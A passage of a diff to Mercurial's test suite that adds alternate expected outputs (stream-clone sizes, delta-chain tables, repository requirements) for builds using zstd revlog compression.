+ 0070: 43 72 65 76 6c 6f 67 2d 63 6f 6d 70 72 65 73 73 |Crevlog-compress| (zstd !) + 0080: 69 6f 6e 2d 7a 73 74 64 25 32 43 72 65 76 6c 6f |ion-zstd%2Crevlo| (zstd !) + 0090: 67 76 31 25 32 43 73 70 61 72 73 65 72 65 76 6c |gv1%2Csparserevl| (zstd !) + 00a0: 6f 67 25 32 43 73 74 6f 72 65 00 00 80 00 73 08 |og%2Cstore....s.| (zstd !) + 00b0: 42 64 61 74 61 2f 30 2e 69 00 03 00 01 00 00 00 |Bdata/0.i.......| (zstd !) + 00c0: 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 |................| (zstd !) + 00d0: 01 ff ff ff ff ff ff ff ff 80 29 63 a0 49 d3 23 |..........)c.I.#| (zstd !) + 00e0: 87 bf ce fe 56 67 92 67 2c 69 d1 ec 39 00 00 00 |....Vg.g,i..9...| (zstd !) + 00f0: 00 00 00 00 00 00 00 00 00 75 30 73 08 42 64 61 |.........u0s.Bda| (zstd !) --uncompressed is an alias to --stream #if stream-legacy $ hg clone --uncompressed -U http://localhost:$HGPORT clone1-uncompressed streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*/sec) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found #endif #if stream-bundle2 $ hg clone --uncompressed -U http://localhost:$HGPORT clone1-uncompressed streaming all changes - 1030 files to transfer, 96.5 KB of data - transferred 96.5 KB in * seconds (* */sec) (glob) + 1030 files to transfer, 96.5 KB of data (no-zstd !) + transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) #endif Clone with background file closing enabled @@ -255,10 +276,12 @@ sending branchmap command streaming all changes sending stream_out command - 1027 files to transfer, 96.3 KB of data + 1027 files to transfer, 96.3 KB of data (no-zstd !) 
+ 1027 files to transfer, 93.5 KB of data (zstd !) starting 4 threads for background file closing updating the branch cache - transferred 96.3 KB in * seconds (*/sec) (glob) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) query 1; heads sending batch command searching for changes @@ -285,12 +308,15 @@ bundle2-input-bundle: with-transaction bundle2-input-part: "stream2" (params: 3 mandatory) supported applying stream bundle - 1030 files to transfer, 96.5 KB of data + 1030 files to transfer, 96.5 KB of data (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) starting 4 threads for background file closing starting 4 threads for background file closing updating the branch cache - transferred 96.5 KB in * seconds (* */sec) (glob) - bundle2-input-part: total payload size 112094 + transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !) + bundle2-input-part: total payload size 112094 (no-zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) + bundle2-input-part: total payload size 109216 (zstd !) bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-bundle: 2 parts total checking for updated bookmarks @@ -322,16 +348,20 @@ #if stream-legacy $ hg clone --stream -U http://localhost:$HGPORT secret-allowed streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*/sec) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found #endif #if stream-bundle2 $ hg clone --stream -U http://localhost:$HGPORT secret-allowed streaming all changes - 1030 files to transfer, 96.5 KB of data - transferred 96.5 KB in * seconds (* */sec) (glob) + 1030 files to transfer, 96.5 KB of data (no-zstd !) 
+ transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) #endif $ killdaemons.py @@ -437,8 +467,10 @@ #if stream-legacy $ hg clone --stream http://localhost:$HGPORT with-bookmarks streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -447,8 +479,10 @@ #if stream-bundle2 $ hg clone --stream http://localhost:$HGPORT with-bookmarks streaming all changes - 1033 files to transfer, 96.6 KB of data - transferred 96.6 KB in * seconds (* */sec) (glob) + 1033 files to transfer, 96.6 KB of data (no-zstd !) + transferred 96.6 KB in * seconds (* */sec) (glob) (no-zstd !) + 1033 files to transfer, 93.8 KB of data (zstd !) + transferred 93.8 KB in * seconds (* */sec) (glob) (zstd !) updating to branch default 1025 files updated, 0 files merged, 0 files removed, 0 files unresolved #endif @@ -467,8 +501,10 @@ #if stream-legacy $ hg clone --stream http://localhost:$HGPORT phase-publish streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) 
searching for changes no changes found updating to branch default @@ -477,8 +513,10 @@ #if stream-bundle2 $ hg clone --stream http://localhost:$HGPORT phase-publish streaming all changes - 1033 files to transfer, 96.6 KB of data - transferred 96.6 KB in * seconds (* */sec) (glob) + 1033 files to transfer, 96.6 KB of data (no-zstd !) + transferred 96.6 KB in * seconds (* */sec) (glob) (no-zstd !) + 1033 files to transfer, 93.8 KB of data (zstd !) + transferred 93.8 KB in * seconds (* */sec) (glob) (zstd !) updating to branch default 1025 files updated, 0 files merged, 0 files removed, 0 files unresolved #endif @@ -503,8 +541,10 @@ $ hg clone --stream http://localhost:$HGPORT phase-no-publish streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (* */sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -516,8 +556,10 @@ #if stream-bundle2 $ hg clone --stream http://localhost:$HGPORT phase-no-publish streaming all changes - 1034 files to transfer, 96.7 KB of data - transferred 96.7 KB in * seconds (* */sec) (glob) + 1034 files to transfer, 96.7 KB of data (no-zstd !) + transferred 96.7 KB in * seconds (* */sec) (glob) (no-zstd !) + 1034 files to transfer, 93.9 KB of data (zstd !) + transferred 93.9 KB in * seconds (* */sec) (glob) (zstd !) updating to branch default 1025 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg -R phase-no-publish phase -r 'all()' @@ -561,8 +603,10 @@ $ hg clone -U --stream http://localhost:$HGPORT with-obsolescence streaming all changes - 1035 files to transfer, 97.1 KB of data - transferred 97.1 KB in * seconds (* */sec) (glob) + 1035 files to transfer, 97.1 KB of data (no-zstd !) 
+ transferred 97.1 KB in * seconds (* */sec) (glob) (no-zstd !) + 1035 files to transfer, 94.3 KB of data (zstd !) + transferred 94.3 KB in * seconds (* */sec) (glob) (zstd !) $ hg -R with-obsolescence log -T '{rev}: {phase}\n' 1: draft 0: draft diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -43,7 +43,8 @@ copies-sdc: yes yes no revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default #else $ hg debugformat -v @@ -57,7 +58,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default #endif $ echo a > a @@ -428,7 +430,8 @@ copies-sdc: yes yes no revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugsidedata -c -- 0 1 sidedata entries @@ -454,7 +457,8 @@ copies-sdc: no no no revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugsidedata -c -- 0 1 sidedata entries @@ -482,7 +486,8 @@ copies-sdc: yes yes no revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) 
compression-level: default default default $ hg debugsidedata -c -- 0 1 sidedata entries diff --git a/tests/test-debugcommands.t b/tests/test-debugcommands.t --- a/tests/test-debugcommands.t +++ b/tests/test-debugcommands.t @@ -368,7 +368,8 @@ 7 1 8 1 9 1 - 10 2 + 10 2 (no-zstd !) + 10 1 (zstd !) 11 1 $ hg --config extensions.strip= strip --no-backup -r 1 1 files updated, 0 files merged, 0 files removed, 0 files unresolved diff --git a/tests/test-generaldelta.t b/tests/test-generaldelta.t --- a/tests/test-generaldelta.t +++ b/tests/test-generaldelta.t @@ -106,22 +106,33 @@ 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg -R repo debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 - 1 1 2 0 prev 57 135 161 1.19259 161 0 0.00000 - 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 + 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !) + 1 1 2 0 prev 57 135 161 1.19259 161 0 0.00000 (no-zstd !) + 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 (no-zstd !) + 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !) + 1 1 2 0 prev 57 135 164 1.21481 164 0 0.00000 (zstd !) + 2 1 3 1 prev 57 135 221 1.63704 221 0 0.00000 (zstd !) 3 2 1 -1 base 104 135 104 0.77037 104 0 0.00000 $ hg -R usegd debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 - 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 - 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 - 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 + 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !) + 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 (no-zstd !) + 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 (no-zstd !) + 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 (no-zstd !) + 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !) + 1 1 2 0 p1 57 135 164 1.21481 164 0 0.00000 (zstd !) 
+ 2 1 3 1 prev 57 135 221 1.63704 221 0 0.00000 (zstd !) + 3 1 2 0 p1 57 135 164 1.21481 278 114 0.69512 (zstd !) $ hg -R full debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 - 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 - 2 1 2 0 p1 57 135 161 1.19259 218 57 0.35404 - 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 + 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !) + 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 (no-zstd !) + 2 1 2 0 p1 57 135 161 1.19259 218 57 0.35404 (no-zstd !) + 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 (no-zstd !) + 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !) + 1 1 2 0 p1 57 135 164 1.21481 164 0 0.00000 (zstd !) + 2 1 2 0 p1 57 135 164 1.21481 221 57 0.34756 (zstd !) + 3 1 2 0 p1 57 135 164 1.21481 278 114 0.69512 (zstd !) Test revlog.optimize-delta-parent-choice @@ -142,9 +153,12 @@ $ hg commit -q -m merge $ hg debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 - 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 - 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 + 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 (no-zstd !) + 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 (no-zstd !) + 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 (no-zstd !) + 0 1 1 -1 base 68 215 68 0.31628 68 0 0.00000 (zstd !) + 1 1 2 0 prev 70 86 138 1.60465 138 0 0.00000 (zstd !) + 2 1 2 0 p2 68 301 136 0.45183 206 70 0.51471 (zstd !) $ hg strip -q -r . 
--config extensions.strip= @@ -154,9 +168,12 @@ $ hg commit -q -m merge --config storage.revlog.optimize-delta-parent-choice=yes $ hg debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 - 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 - 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 + 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 (no-zstd !) + 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 (no-zstd !) + 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 (no-zstd !) + 0 1 1 -1 base 68 215 68 0.31628 68 0 0.00000 (zstd !) + 1 1 2 0 prev 70 86 138 1.60465 138 0 0.00000 (zstd !) + 2 1 2 0 p2 68 301 136 0.45183 206 70 0.51471 (zstd !) Test that strip bundle use bundle2 $ hg --config extensions.strip= strip . @@ -267,12 +284,17 @@ 46 3 29 45 p1 58 1334 1671 1.25262 1671 0 0.00000 47 3 30 46 p1 58 1380 1729 1.25290 1729 0 0.00000 48 3 31 47 p1 58 1426 1787 1.25316 1787 0 0.00000 - 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 - 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 - 51 4 3 50 prev 356 594 611 1.02862 611 0 0.00000 - 52 4 4 51 p1 58 640 669 1.04531 669 0 0.00000 + 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 (no-zstd !) + 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 (no-zstd !) + 51 4 3 50 prev 356 594 611 1.02862 611 0 0.00000 (no-zstd !) + 52 4 4 51 p1 58 640 669 1.04531 669 0 0.00000 (no-zstd !) + 49 4 1 -1 base 205 316 205 0.64873 205 0 0.00000 (zstd !) + 50 4 2 49 p1 58 362 263 0.72652 263 0 0.00000 (zstd !) + 51 4 3 50 prev 366 594 629 1.05892 629 0 0.00000 (zstd !) + 52 4 4 51 p1 58 640 687 1.07344 687 0 0.00000 (zstd !) 53 5 1 -1 base 0 0 0 0.00000 0 0 0.00000 - 54 6 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 54 6 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 54 6 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) 
$ hg clone --pull source-repo --config experimental.maxdeltachainspan=2800 relax-chain --config format.generaldelta=yes requesting all changes adding changesets @@ -333,12 +355,17 @@ 46 3 29 45 p1 58 1334 1671 1.25262 1671 0 0.00000 47 3 30 46 p1 58 1380 1729 1.25290 1729 0 0.00000 48 3 31 47 p1 58 1426 1787 1.25316 1787 0 0.00000 - 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 - 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 - 51 2 13 17 p1 58 594 739 1.24411 2781 2042 2.76319 - 52 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 (no-zstd !) + 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 (no-zstd !) + 51 2 13 17 p1 58 594 739 1.24411 2781 2042 2.76319 (no-zstd !) + 52 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 49 4 1 -1 base 205 316 205 0.64873 205 0 0.00000 (zstd !) + 50 4 2 49 p1 58 362 263 0.72652 263 0 0.00000 (zstd !) + 51 2 13 17 p1 58 594 739 1.24411 2789 2050 2.77402 (zstd !) + 52 5 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) 53 6 1 -1 base 0 0 0 0.00000 0 0 0.00000 - 54 7 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 54 7 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 54 7 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) $ hg clone --pull source-repo --config experimental.maxdeltachainspan=0 noconst-chain --config format.usegeneraldelta=yes --config storage.revlog.reuse-external-delta-parent=no requesting all changes adding changesets @@ -404,4 +431,5 @@ 51 2 13 17 p1 58 594 739 1.24411 2642 1903 2.57510 52 2 14 51 p1 58 640 797 1.24531 2700 1903 2.38770 53 4 1 -1 base 0 0 0 0.00000 0 0 0.00000 - 54 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 54 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 54 5 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) 
diff --git a/tests/test-http-bundle1.t b/tests/test-http-bundle1.t --- a/tests/test-http-bundle1.t +++ b/tests/test-http-bundle1.t @@ -38,7 +38,8 @@ #if no-reposimplestore $ hg clone --stream http://localhost:$HGPORT/ copy 2>&1 streaming all changes - 6 files to transfer, 606 bytes of data + 6 files to transfer, 606 bytes of data (no-zstd !) + 6 files to transfer, 608 bytes of data (zstd !) transferred * bytes in * seconds (*/sec) (glob) searching for changes no changes found @@ -225,7 +226,8 @@ #if no-reposimplestore $ hg clone http://user:pass@localhost:$HGPORT2/ dest 2>&1 streaming all changes - 7 files to transfer, 916 bytes of data + 7 files to transfer, 916 bytes of data (no-zstd !) + 7 files to transfer, 919 bytes of data (zstd !) transferred * bytes in * seconds (*/sec) (glob) searching for changes no changes found diff --git a/tests/test-http.t b/tests/test-http.t --- a/tests/test-http.t +++ b/tests/test-http.t @@ -29,7 +29,8 @@ #if no-reposimplestore $ hg clone --stream http://localhost:$HGPORT/ copy 2>&1 streaming all changes - 9 files to transfer, 715 bytes of data + 9 files to transfer, 715 bytes of data (no-zstd !) + 9 files to transfer, 717 bytes of data (zstd !) transferred * bytes in * seconds (*/sec) (glob) updating to branch default 4 files updated, 0 files merged, 0 files removed, 0 files unresolved diff --git a/tests/test-init.t b/tests/test-init.t --- a/tests/test-init.t +++ b/tests/test-init.t @@ -21,6 +21,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -59,6 +60,7 @@ $ hg --config format.usestore=false init old $ checknewrepo old generaldelta + revlog-compression-zstd (zstd !) revlogv1 testonly-simplestore (reposimplestore !) sparserevlog @@ -70,6 +72,7 @@ store created 00changelog.i created generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -83,6 +86,7 @@ 00changelog.i created fncache generaldelta + revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog store @@ -96,6 +100,7 @@ 00changelog.i created dotencode fncache + revlog-compression-zstd (zstd !) revlogv1 store testonly-simplestore (reposimplestore !) @@ -213,6 +218,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -233,6 +239,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -249,6 +256,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-lfconvert.t b/tests/test-lfconvert.t --- a/tests/test-lfconvert.t +++ b/tests/test-lfconvert.t @@ -99,6 +99,7 @@ fncache generaldelta largefiles + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-lfs-largefiles.t b/tests/test-lfs-largefiles.t --- a/tests/test-lfs-largefiles.t +++ b/tests/test-lfs-largefiles.t @@ -293,6 +293,7 @@ fncache generaldelta lfs + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-narrow-clone-no-ellipsis.t b/tests/test-narrow-clone-no-ellipsis.t --- a/tests/test-narrow-clone-no-ellipsis.t +++ b/tests/test-narrow-clone-no-ellipsis.t @@ -26,6 +26,7 @@ dotencode fncache narrowhg-experimental + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-narrow-clone-stream.t b/tests/test-narrow-clone-stream.t --- a/tests/test-narrow-clone-stream.t +++ b/tests/test-narrow-clone-stream.t @@ -68,6 +68,7 @@ fncache (flat-fncache !) generaldelta narrowhg-experimental + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-narrow-clone.t b/tests/test-narrow-clone.t --- a/tests/test-narrow-clone.t +++ b/tests/test-narrow-clone.t @@ -42,6 +42,7 @@ dotencode fncache narrowhg-experimental + revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog store diff --git a/tests/test-narrow-sparse.t b/tests/test-narrow-sparse.t --- a/tests/test-narrow-sparse.t +++ b/tests/test-narrow-sparse.t @@ -61,6 +61,7 @@ fncache generaldelta narrowhg-experimental + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-obsolete.t b/tests/test-obsolete.t --- a/tests/test-obsolete.t +++ b/tests/test-obsolete.t @@ -97,8 +97,10 @@ # rev p1rev p2rev start end deltastart base p1 p2 rawsize totalsize compression heads chainlen 0 -1 -1 0 59 0 0 0 0 58 58 0 1 0 1 0 -1 59 118 59 59 0 0 58 116 0 1 0 - 2 1 -1 118 193 118 118 59 0 76 192 0 1 0 - 3 1 -1 193 260 193 193 59 0 66 258 0 2 0 + 2 1 -1 118 193 118 118 59 0 76 192 0 1 0 (no-zstd !) + 3 1 -1 193 260 193 193 59 0 66 258 0 2 0 (no-zstd !) + 2 1 -1 118 195 118 118 59 0 76 192 0 1 0 (zstd !) + 3 1 -1 195 262 195 195 59 0 66 258 0 2 0 (zstd !) $ hg debugobsolete 245bde4270cd1072a27757984f9cda8ba26f08ca cdbce2fbb16313928851e97e0d85413f3f7eb77f C (Thu Jan 01 00:00:01 1970 -0002) {'user': 'test'} diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -60,7 +60,8 @@ copies-sdc: no revlog-v2: no plain-cl-delta: yes - compression: zlib + compression: zlib (no-zstd !) + compression: zstd (zstd !) compression-level: default $ hg debugbuilddag .+5000 --new-file @@ -579,13 +580,15 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugupgraderepo --run --no-backup upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) 
+ preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) removed: persistent-nodemap processed revlogs: @@ -624,13 +627,15 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugupgraderepo --run --no-backup upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) added: persistent-nodemap persistent-nodemap @@ -669,7 +674,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) optimisations: re-delta-all @@ -744,11 +750,13 @@ $ hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone --debug | egrep '00(changelog|manifest)' adding [s] 00manifest.n (70 bytes) adding [s] 00manifest.i (313 KB) - adding [s] 00manifest.d (452 KB) + adding [s] 00manifest.d (452 KB) (no-zstd !) + adding [s] 00manifest.d (491 KB) (zstd !) adding [s] 00manifest-*.nd (118 KB) (glob) adding [s] 00changelog.n (70 bytes) adding [s] 00changelog.i (313 KB) - adding [s] 00changelog.d (360 KB) + adding [s] 00changelog.d (360 KB) (no-zstd !) + adding [s] 00changelog.d (368 KB) (zstd !) 
adding [s] 00changelog-*.nd (118 KB) (glob) $ ls -1 stream-clone/.hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) diff --git a/tests/test-phases.t b/tests/test-phases.t --- a/tests/test-phases.t +++ b/tests/test-phases.t @@ -886,6 +886,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -913,6 +914,7 @@ fncache generaldelta internal-phase + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-bgprefetch.t b/tests/test-remotefilelog-bgprefetch.t --- a/tests/test-remotefilelog-bgprefetch.t +++ b/tests/test-remotefilelog-bgprefetch.t @@ -29,8 +29,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow --noupdate streaming all changes - 2 files to transfer, 776 bytes of data - transferred 776 bytes in * seconds (*/sec) (glob) + 2 files to transfer, 776 bytes of data (no-zstd !) + transferred 776 bytes in * seconds (*/sec) (glob) (no-zstd !) + 2 files to transfer, 784 bytes of data (zstd !) + transferred 784 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found diff --git a/tests/test-remotefilelog-clone-tree.t b/tests/test-remotefilelog-clone-tree.t --- a/tests/test-remotefilelog-clone-tree.t +++ b/tests/test-remotefilelog-clone-tree.t @@ -30,6 +30,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -71,6 +72,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -112,6 +114,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-clone.t b/tests/test-remotefilelog-clone.t --- a/tests/test-remotefilelog-clone.t +++ b/tests/test-remotefilelog-clone.t @@ -27,6 +27,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog store @@ -61,6 +62,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -110,6 +112,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-log.t b/tests/test-remotefilelog-log.t --- a/tests/test-remotefilelog-log.t +++ b/tests/test-remotefilelog-log.t @@ -30,6 +30,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-partial-shallow.t b/tests/test-remotefilelog-partial-shallow.t --- a/tests/test-remotefilelog-partial-shallow.t +++ b/tests/test-remotefilelog-partial-shallow.t @@ -18,8 +18,10 @@ $ hg clone --shallow ssh://user@dummy/master shallow --noupdate --config remotefilelog.includepattern=foo streaming all changes - 3 files to transfer, 336 bytes of data - transferred 336 bytes in * seconds (*/sec) (glob) + 3 files to transfer, 336 bytes of data (no-zstd !) + transferred 336 bytes in * seconds (* */sec) (glob) (no-zstd !) + 3 files to transfer, 338 bytes of data (zstd !) + transferred 338 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cat >> shallow/.hg/hgrc <<EOF diff --git a/tests/test-remotefilelog-prefetch.t b/tests/test-remotefilelog-prefetch.t --- a/tests/test-remotefilelog-prefetch.t +++ b/tests/test-remotefilelog-prefetch.t @@ -22,8 +22,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow --noupdate streaming all changes - 2 files to transfer, 528 bytes of data - transferred 528 bytes in * seconds (*/sec) (glob) + 2 files to transfer, 528 bytes of data (no-zstd !) + transferred 528 bytes in * seconds (* */sec) (glob) (no-zstd !) + 2 files to transfer, 532 bytes of data (zstd !) + transferred 532 bytes in * seconds (* */sec) (glob) (zstd !) 
